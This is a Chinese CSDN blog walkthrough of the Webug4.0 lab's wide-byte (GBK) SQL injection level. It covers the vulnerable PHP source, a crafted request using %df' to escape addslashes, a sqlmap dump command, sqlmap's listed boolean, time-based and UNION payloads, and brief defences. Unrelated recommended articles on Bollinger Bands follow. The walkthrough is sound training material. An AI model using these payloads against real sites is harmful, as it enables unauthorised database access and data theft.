Webug4.0通关笔记04- 第6关宽字节注入

最新推荐文章于 2025-04-29 16:11:40 发布
最新推荐文章于 2025-04-29 16:11:40 发布
阅读量732 收藏 8
点赞数 17
分类专栏: webug靶场 文章标签: web安全 webug靶场 SQL注入 宽字节注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128119506
版权

目录

一、宽字节注入原理

二、第04关 宽字节注入渗透实战

1.打开靶场

2.源码分析

3.sqlmap注入

(1)bp抓包保存

 (2)sqlmap注入

 (3)获取flag

三、漏洞防御

本文通过《Webug4.0通关笔记系列》来进行Webug4.0靶场的渗透实战,本文讲解Webug4.0靶场第6关宽字节注入的渗透实战。

一、宽字节注入原理

宽字节注入是一种特殊类型的SQL注入漏洞,主要影响使用GBK、BIG5等多字节编码的数据库系统。其核心原理是利用数据库和应用程序对字符编码处理的差异,导致转义字符(如反斜杠\)被"吞并"到宽字符中,从而使原本的转义失效。宽字节注入的原理如下所示。

  1. 编码差异:GBK编码中,某些字符(如%bf%5c)组合会被识别为一个完整字符

  2. 转义失效:攻击者精心构造的%bf'与系统添加的转义符\%5c)组合成合法字符

  3. 注入成功:剩余的单引号未被转义,破坏SQL语句结构

以下是一些宽字节注入中常用的编码及相关说明,以表格形式呈现:

编码类型说明示例
GBK常见的中文字符集,一个汉字由两个字节表示。在宽字节注入中常被利用,因为某些特殊字符组合可绕过单引号转义。%df' 在 GBK 中会被解析为一个宽字节字符,可用于逃逸单引号。
BIG5繁体中文字符集,同样是双字节编码。类似于 GBK,也可能存在宽字节注入漏洞。%a1%a2 等组合可能被利用。

二、第04关 宽字节注入渗透实战

1.打开靶场

http://192.168.71.1/webug4/control/sqlinject/width_byte_injection.php?id=1

2.源码分析

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}

if (isset($_GET["id"])) {
    if (!empty($_GET["id"])) {
        // 过滤引号
        $id = addslashes($_GET['id']);
        $dbConnectWidth->query("SET names 'gbk'");
        $sql = "SELECT * FROM sqlinjection WHERE id = '{$id}'";
        $res = $dbConnectWidth->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
    }
}
require_once TPMELATE."/manifest-error-injection.html";

对其中关键代码进行注释,如下所示。

// 检查是否存在id参数
if (isset($_GET["id"])) {
    // 检查id参数是否非空
    if (!empty($_GET["id"])) {
        // 使用addslashes对输入进行转义(主要转义单引号等特殊字符)
        $id = addslashes($_GET['id']);
        
        // 设置数据库连接使用GBK编码(危险操作)
        $dbConnectWidth->query("SET names 'gbk'");
        
        // 构造SQL查询语句(直接将用户输入拼接到SQL中)
        $sql = "SELECT * FROM sqlinjection WHERE id = '{$id}'";
        
        // 执行查询,如果失败则输出错误信息和SQL语句(安全隐患)
        $res = $dbConnectWidth->query($sql) or die("Invalid query: " . mysqli_stmt_error(). $sql);
    }
}

 如上所示,SQL语句对GET型参数输入id进行了转移,故而存在普通的字符型SQL注入语句不能渗透成功,但是脚本中使用gbk编码,这也说明存在宽字节注入漏洞。

  • 漏洞成因组合

    • SET names 'gbk':强制使用GBK宽字符编码,这导致很大概率会有宽字节注入漏洞

    • addslashes():使用PHP的转义函数

    • 直接SQL拼接:'{$id}'直接将用户输入嵌入SQL

  • 攻击原理

    • 当输入%bf'时:

      • addslashes()会将其转义为%bf\'%bf%5c%27

      • 在GBK编码中,%bf%5c会被解析为一个中文字符"縗"

      • 剩余的单引号%27未被转义,破坏SQL结构

    • 最终SQL变为:

SELECT * FROM sqlinjection WHERE id = '縗' OR 1=1 -- '

3.sqlmap注入

(1)bp抓包保存

在渗透的过程中,bp拦截报文并将报文保存为webug06.txt

修改webug06.txt,在注入点id处尾部加上%df 然后加入注释符%23,并在闭合符号'与注释符中间加上*,如下所示。

GET /webug4/control/sqlinject/width_byte_injection.php?id=1%df'*%23 HTTP/1.1
Host: 192.168.71.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.71.1/webug4/control/we_bug_env.php
Cookie: PHPSESSID=n5mmqjrmgn3fou55o8pbkeb8r7
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

 (2)sqlmap注入

sqlmap -r webug07.txt --current-db --batch -D webug  -T env_list  --dump

如下所示渗透成功

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' AND 4068=4068#
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' AND (SELECT 1835 FROM (SELECT(SLEEP(5)))hRSI)#
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: http://192.168.71.1:80/webug4/control/sqlinject/width_byte_injection.php?id=1%df' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x72625851486b4e4644685346714e41684169784978616d6c4f76785a68646f57667a48634964776c,0x71626a6b71)-- -#
    Vector:  UNION ALL SELECT NULL,[QUERY]-- -
---

 (3)获取flag

如下所示,渗透成功,flag为dfsadfsadfas

三、漏洞防御

  • 使用预编译语句:预编译语句会将数据和代码分离,避免恶意代码被当作 SQL 语句的一部分执行,例如使用 PDO 或 mysqli 的预编译功能。
  • 设置正确的字符集:确保 Web 应用、数据库连接和数据库本身的字符集设置一致,避免因字符集问题导致的漏洞。
  • 进行严格的输入验证:不仅要过滤特殊字符,还要对输入的长度、类型等进行严格检查,确保输入符合预期。

【Python量化】布林带策略
mfsdmlove的博客
08-17 7606
布林带(BOLL)指标是美国股市分析家约翰·布林根据统计学中的标准差原理设计出来的一种非常简单实用的技术分析指标。一般而言,股价的运动总是围绕某一价值中枢(如均线、成本线等)在一定的范围内变动,布林线指标正是在上述条件的基础上,引进了“股价通道”的概念,其认为股价通道的宽窄随着股价波动幅度的大小而变化,而且股价通道又具有变异性,它会随着股价的变化而自动调整。...
布林线BOLL指标详解.pdf
05-29
布林线BOLL指标详解.pdf
布林带(BOLL)技术指标
1
04-20 2425
它利用统计原理,求出价格的标准差及其信赖区间,从而确定股价的波动范围及未来走势,利用波带显示股价的风险、安全的高低价位,因此也称之为布林带。 布林线特别运用了爱因斯坦的相对论,认为各类市场间都是互动的,市场内和市场间的各种变化都是相对性的,是不存在绝对性的,市场价格的高低是相对的。  图中三种情况是BOLL 固定的三种行情走势(紫色线:上轨 白色线:中
量化投资常用技能——指标篇2:详解BOLL(布林线)指标,及其代码实现和绘图
weixin_41782172的博客
12-15 1万+
量化投资常用技能 系列文章目录 我们已经介绍了三篇关于量化投资方面绘图的文章和一篇指标类的推导和介绍的文章,大家有兴趣可以了解一下 绘图篇 量化投资常用技能——绘图篇 1:绘制股票收盘价格曲线和ochl烛状图 量化投资常用技能——绘图篇 2:绘制移动平均线 量化投资常用技能——绘图篇3:绘制黄金分割线 指标篇 量化投资常用技能——指标篇1:详解 MACD指标绘制、及其计算过程和作用 量化投资常用技能——指标篇2量化投资常用技能 系列文章目录前言一、布林线介绍二、使用步骤1.引入库2.读入数
布林带(Bollinger Bands)
heixiniu的博客
12-23 2122
布林带(Bollinger Bands)是一种技术分析工具, 由约翰·布林格(John Bollinger)在20世纪80年代提出。它主要用于衡量市场的波动性, 并识别价格可能的高低点。
指标详解(5)-- 布林线指标(BOLL)详解
12-06 1276
一、定义:布林线指标,即BOLL指标,其英文全称是“Bollinger Bands”,布林线(BOLL)由约翰·布林先生创造,其利用统计原理,求出股价的标准差及其信赖区间,从而确定股价的波动范围及未来走势,利用波带显示股价的安全高低价位,因而也被称为布林带。 二、BOLL指标中的上、中、下轨线的意义: 1.BOLL指标中的上、中、下轨线所形成的股价信道的移动范围...
量化交易入门(二十八)什么是布林带,量化中怎么使用
Coder加油站的专栏
03-29 1251
需要注意的是,布林带只是一种技术分析工具,在实际应用中还需要结合其他因素(如基本面分析、市场情绪等)以及严格的风险管理措施。此外,不同的市场和资产可能需要对布林带的参数(如中轨的移动平均期间、标准差的倍数等)进行优化和调整。需要注意的是,布林带的参数(如n和k)可以根据不同的市场和策略进行调整。这意味着,在正态分布的假设下,约95%的价格数据会落在布林带的范围内。布林带基于移动平均线和标准差,因此兼具趋势和波动率的特性。价格通常在布林带的范围内波动,突破上轨或下轨可能表明趋势的形成或反转。
布林通道参数用20还是26_布林线指标参数设置为13、20、26、30、60、99,那个才是最佳?...
热门推荐
weixin_42418754的博客
12-29 5万+
布林线(Boll)指标是通过计算股价的“标准差”,再求股价的“信赖区间”。很多炒股新人不知道怎么设置布林线的参数,13、20、26、30、60、99那个才是最佳?下面详细介绍,一起来学习吧。布林带指标参数设置多少才最佳?布林带的参数一般默认的情况下是(20.2),这个20指的是中轨,也是所谓的20日均线,而后面的2则是所谓的2个标准差,所以这两者最终计算出来之后就是布林带的上轨和下轨。总的来说,在...
常用技术指标之一文读懂BOLL布林线指标
richardzhutalk的博客
07-02 4825
布林线BOLL指标(Bollinger Bands)是股市技术分析的常用工具之一,由美国金融分析师John Bollinger根据移动平均线和统计学中的标准差原理于1980年代设计出来。布林线指标由上、中、下三条轨线组成,其中上中下轨线可以分别看成是股价的压力线、平均线和支撑线,股价在上限和下限的区间即股价通道内波动。股价通道会随着股价波动幅度的大小而变化。布林线一般取20日作为参数...
什么是布林带?
最新发布
2301_77604523的博客
04-29 316
布林带是约翰·布林格在20世纪80年代开发的一种广泛使用的技术分析工具。布林带由价格图表上的三条线组成:中轨、上轨和下轨。中轨通常是20天简单移动平均线(SMA),代表资产在此期间的平均价格。上轨和下轨与中轨相差两个标准差,用于说明资产的波动性。布林带的主要目的是给市场的高价和低价一个相对的定义。当某项资产的价格接近上轨时,表明该资产可能出现超买,暗示可能出现反转或上升趋势放缓。相反,当价格接近下轨时,可能意味着资产超卖,预示着潜在的买入机会或下降趋势暂停。布林带是动态的,会根据市场情况进行调整。
2010-最新布林线BOLL选底方法[定义].pdf
10-10
布林线BOLL)是一种常用的技术指标,用于衡量股票价格的波动性和趋势。布林线由四条线组成:B1线、B2线、B3线和B4线。其中,B1线为阻力线,B4线为支撑线。布林线的宽度可以反映股票价格的变动区间。当股票价格触及...
布林带(自由设参数)
06-16
外汇黄金交易,布林带(自由设参数)指标,《黄金高盛算交易》4小时交易系统指标 适合黄金、白银、外汇、期货、现货等。
布林线均值回归_boll_布林线均值回归_
09-29
BOLL指标是美国股市分析家约翰·布林根据统计学中的标准差原理设计出来的一种非常简单实用的技术分析指标。一般而言,股价的运动总是围绕某一价值中枢(如均线、成本线等)在一定的范围内变动,布林线指标正是在上述...
boll-M传统通达信指标公式源码.doc
08-11
* boll-M传统通达信指标是基于移动平均线和标准差的技术指标,用于衡量证券的价格波动性。 * 该指标由三个部分组成:中间值、上轨和下轨,用于 ajudicating证券的趋势和风险。 * 该指标可以与其他技术指标结合使用,...
布林线BOLL指标详解.doc
09-29
布林线BOLL指标通过动态调整价格通道来反映市场的波动性。在市场波动增大时,通道会变宽;反之,波动减小时,通道会收窄。这个指标结合了统计学中的标准差原理,能够提供动态的价格边界,帮助交易者识别超买和超卖...
通达信的系统BOLL-M
涂睿的专栏
04-10 2243
{参数 N: 2 250 20 }
量化进阶—— 高胜算交易策略(布林线
JDquant的博客
04-13 1万+
阅读原文:京东量化平台-投资者提供数据支持、策略开发到策略输出的量化生态服务 京东金融官方资讯QQ群:417082141 有什么想咨询的都可以来询问我们哦 金融投机家保持100笔交易成功率达85%以上,得益于高胜算的趋势交易策略。综合技术应用顾比均线系统、布林通道、K线理论、市场热点、盘感等等。  高胜算交易,指专业交易员奉行的交易行为原则,是以胜率为交易执行准则的金融、金融衍
商品期货策略-ATR通道突破策略
bigquant的博客
01-11 1万+
实现平台:BigQuant—人工智能量化投资平台 可在文末前往原文一键克隆代码进行进一步研究 导语:商品期货交易上线啦!听闻这个消息的小编当然坐不住了,决定立刻商品期货走一波!本文选择实现的是经典的ATR通道突破策略(也被称为波动性突破策略,曾多年获得实盘前10策略殊荣),让我们来看看ATR通道突破策略在商品期货中的应用吧! 背景知识 真实波动幅度均值(ATR)是由威尔斯·威尔德(J. ...
python BOLL
08-24
BOLL布林线Bollinger Bands)技术指标的简称。布林线是一种常用的技术分析工具,用于测量价格的波动性和价格趋势的变化。它主要由三条线组成:中轨(BBANDMid)、上轨(BBANDUp)和下轨(BBANDLow)。 在Python中,可以使用不同的库来计算和绘制布林线指标,其中包括ta-lib库。ta-lib库是一个广泛应用于量化交易的开源技术分析库,提供了各种技术指标的计算和绘图函数。 使用ta-lib库计算BOLL指标的过程相对简单,可以通过调用相应的函数来实现。例如,可以使用ta-lib库中的BBANDS函数来计算布林线指标。该函数需要输入一些参数,如移动平均线的周期(n-periods)和标准差的倍数(β),然后返回布林线的三个值:中轨、上轨和下轨。 以下是一个示例代码,用于使用ta-lib库计算BOLL指标的布林线值: ```python import talib import pandas as pd # 假设已经有一个名为data的DataFrame,包含了价格数据 # 计算布林线指标 n_periods = 20 # 移动平均线的周期 sigma = 2 # 标准差的倍数 data['BBANDMid'], data['BBANDUp'], data['BBANDLow'] = talib.BBANDS(data['close'], timeperiod=n_periods, nbdevup=sigma, nbdevdn=sigma) # 打印布林线指标的值 print(data[['BBANDMid', 'BBANDUp', 'BBANDLow']]) ``` 这段代码使用了一个名为data的DataFrame,其中包含了价格数据。通过调用talib库中的BBANDS函数,并传入相应的参数和价格数据,即可计算出布林线指标的值,并将其保存到data DataFrame中的相应列中。 需要注意的是,计算布林线指标所用到的移动平均线的周期和标准差的倍数可以根据具体需求进行调整。 参考文献: 布林线BOLL)技术指标简介 https://www.jianshu.com/p/500b25cc3a56 python 实现boll 通道计算 https://blog.csdn.net/weixin_44843725/article/details/90354012 ta-lib库文档 https://mrjbq7.github.io/ta-lib/<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Python绘制BOLL布林线指标图](https://blog.csdn.net/qq_41437512/article/details/105473845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [BOLL.py 双轨计算函数](https://download.csdn.net/download/lorry_shear_007/12524189)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值